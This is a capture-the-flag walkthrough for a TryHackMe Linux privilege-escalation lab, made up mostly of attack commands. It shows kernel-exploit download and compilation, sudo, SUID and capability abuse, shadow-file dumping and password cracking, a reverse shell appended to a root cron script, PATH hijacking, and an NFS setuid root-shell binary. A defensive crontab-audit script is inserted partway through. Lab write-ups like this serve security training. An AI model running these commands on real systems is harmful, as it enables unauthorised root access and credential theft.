Linux Privilege Escalation
Room Link: https://tryhackme.com/room/linprivesc
Enumeration
What is the hostname of the target system?
Victim
hostname
What is the Linux kernel version of the target system?
Victim
uname -a
What Linux is this?
Victim
cat /etc/issue
What version of the Python language is installed on the system?
Victim
python -V
What vulnerability seems to affect the kernel of the target system? (Enter a CVE number)
CVE-2015-1328
Privilege Escalation: Kernel Exploits
Victim
uname -a
Kali
wget https://www.exploit-db.com/raw/37292 -O 37292.c
python2 -m SimpleHTTPServer 81
Victim
cd /tmp
wget http://$KALI:81/37292.c
gcc 37292.c -o exploit
chmod +x exploit
./exploit
whoami
Privilege Escalation: Sudo
How many programs can the user "karen" run on the target system with sudo rights?
Victim
sudo -l
What is the content of the flag2.txt file?
Victim
sudo find / -name "flag2.txt"
cat /home/ubuntu/flag2.txt
How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?
Victim
sudo nmap --interactive
What is the hash of frank's password?
Victim
sudo nano /etc/shadow
Privilege Escalation: SUID
Victim
find / -type f -perm -04000 -ls 2>/dev/null
Which user shares the name of a great comic book writer?
Victim
cat /etc/passwd
What is the password of user2?
Since base64 is in the list of SUID binaries, we can use it to read the contents of /etc/shadow and /etc/passwd. Save the output on Kali.
Victim
base64 /etc/shadow | base64 --decode
base64 /etc/passwd | base64 --decode
Kali
unshadow passwd shadow > passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
What is the content of the flag3.txt file?
Victim
find / -name "flag3.txt" 2>/dev/null
base64 /home/ubuntu/flag3.txt | base64 --decode
Privilege Escalation: Capabilities
How many binaries have set capabilities?
Victim
getcap -r / 2>/dev/null
What is the content of the flag4.txt file?

Victim
/home/karen/vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
Victim
find / -name "flag4.txt" 2>/dev/null
cat /home/ubuntu/flag4.txt
Privilege Escalation: Cron Jobs
How many user-defined cron jobs can you see on the target system?
Victim
cat /etc/crontab
Victim
ls -lah /home/karen/backup.sh
cat /home/karen/backup.sh
Kali
nc -lvnp 4444
Victim
chmod +x /home/karen/backup.sh
echo "bash -i >& /dev/tcp/10.10.19.80/4444 0>&1" >> /home/karen/backup.sh
What is Matt's password?
Cat the files and copy them over to Kali.
Victim
cat /etc/passwd
cat /etc/shadow
Kali
unshadow passwd shadow > passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
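A defender's check for the cron job issue above, as an added example that is not part of the original walkthrough: it reads an /etc/crontab-style file and reports root jobs whose script is not owned by the trusted uid or is group/world-writable. The function names, the temporary directory and the sample crontab are constructed for illustration.

```sh
#!/bin/sh
# Audit an /etc/crontab-style file: report root jobs whose script is owned by
# someone other than the trusted uid or is group/world-writable.

check_script() {    # $1 = script path, $2 = trusted owner uid
    ls -ldnL -- "$1" | {
        read -r perms links uid rest
        [ "$uid" = "$2" ] || echo "$1: owned by uid $uid"
        case $perms in      # chars 6 and 9 of the mode string are g+w / o+w
            ?????w*|????????w*) echo "$1: group/world-writable" ;;
        esac
    }
}

audit_crontab() {   # $1 = crontab file, $2 = trusted uid (default 0)
    while read -r m h dom mon dow user cmd rest || [ -n "$m" ]; do
        case $m in ''|'#'*) continue ;; esac         # blank line or comment
        case $m in @*) user=$h; cmd=$dom ;; esac     # "@reboot user command"
        [ "$user" = root ] || continue               # also skips VAR=value lines
        case $cmd in /*) ;; *) continue ;; esac      # first token must be a path
        [ -e "$cmd" ] || continue
        check_script "$cmd" "${2:-0}"
    done < "$1"
}

# Constructed sample: two root jobs, one pointing at a world-writable script.
# The files belong to whoever runs this, so that uid is passed as "trusted".
demo=$(mktemp -d) && trap 'rm -rf "$demo"' EXIT
printf '#!/bin/sh\n' > "$demo/backup.sh"; chmod 777 "$demo/backup.sh"
printf '#!/bin/sh\n' > "$demo/rotate.sh"; chmod 755 "$demo/rotate.sh"
cat > "$demo/crontab" <<EOF
SHELL=/bin/sh
# m h dom mon dow user command
* * * * * root $demo/backup.sh
17 * * * * root $demo/rotate.sh
* * * * * karen $demo/backup.sh
EOF
audit_crontab "$demo/crontab" "$(id -u)"
```

On a real host, run `audit_crontab /etc/crontab` with the default trusted uid of 0; only the first token of each command is checked, so jobs written as `bash /path/script.sh` need the script path checked separately.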
Privilege Escalation: PATH
What is the odd folder you have write access for?
Victim
find / -writable 2>/dev/null
Exploit the $PATH vulnerability to read the content of the flag6.txt file


Victim
cd /home/murdoch
export PATH=/home/murdoch:$PATH
echo "/bin/bash" > thm
chmod 777 thm
./test
Privilege Escalation: NFS
Victim
showmount -e 10.10.216.254
cat /etc/exports

Kali
mkdir /root/attack
mount -o rw 10.10.216.254:/home/ubuntu/sharedfolder /root/attack
subl /root/attack/nfc.c
nfc.c
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setgid(), setuid() */

int main(void)
{
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}
Kali
gcc /root/attack/nfc.c -o /root/attack/nfc -w
chmod +s /root/attack/nfc
Victim
cd /home/ubuntu/sharedfolder
./nfc
Capstone Challenge
Victim
base64 /etc/shadow | base64 --decode
base64 /etc/passwd | base64 --decode
Kali
unshadow passwd shadow > passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
Victim
su missy
Password: Password1
Victim
sudo find . -exec /bin/sh \; -quit
whoami